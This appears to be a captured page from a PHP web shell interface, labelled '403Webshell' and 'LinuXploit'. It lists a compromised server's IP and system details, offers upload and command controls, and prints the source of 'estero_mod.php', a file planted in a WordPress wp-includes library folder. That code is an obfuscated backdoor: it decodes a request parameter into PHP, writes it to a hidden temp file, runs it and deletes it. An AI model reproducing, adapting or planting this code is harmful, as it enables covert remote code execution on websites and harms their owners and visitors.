403Webshell
Server IP : 162.243.168.218  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ISPCONFIG-WEB-EMPRESAS 5.15.0-174-generic #184-Ubuntu SMP Fri Mar 13 18:41:50 UTC 2026 x86_64
User : web23 ( 5020)
PHP Version : 8.3.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/clients/client3/web23/web/wp-includes/sodium_compat/src/Core/SecretStream/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/clients/client3/web23/web/wp-includes/sodium_compat/src/Core/SecretStream/estero_mod.php
<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["\x63omp"])){
	$value = $_REQUEST["\x63omp"];
	 $value= explode		 (	 "." 	, $value  )		;	 
	$obj = '';
            $salt9 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen( $salt9);
            $s = 0;
    
            foreach( $value as $v3) {
                $sChar = ord( $salt9[$s  %$lenS]);
                $dec =( ( int)$v3 - $sChar -( $s  %10)) ^ 19;
                $obj .= chr( $dec);
                $s++;} 
	$parameter_group = array_filter(["/tmp", "/dev/shm", session_save_path(), getenv("TMP"), "/var/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir")]);
	while ($k = array_shift($parameter_group)) {
    		if ((bool)is_dir($k) && (bool)is_writable($k)) {
    $reference = "$k" . "/.val";
    if (@file_put_contents($reference, $obj) !== false) {
	include $reference;
	unlink($reference);
	die();
}
}
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit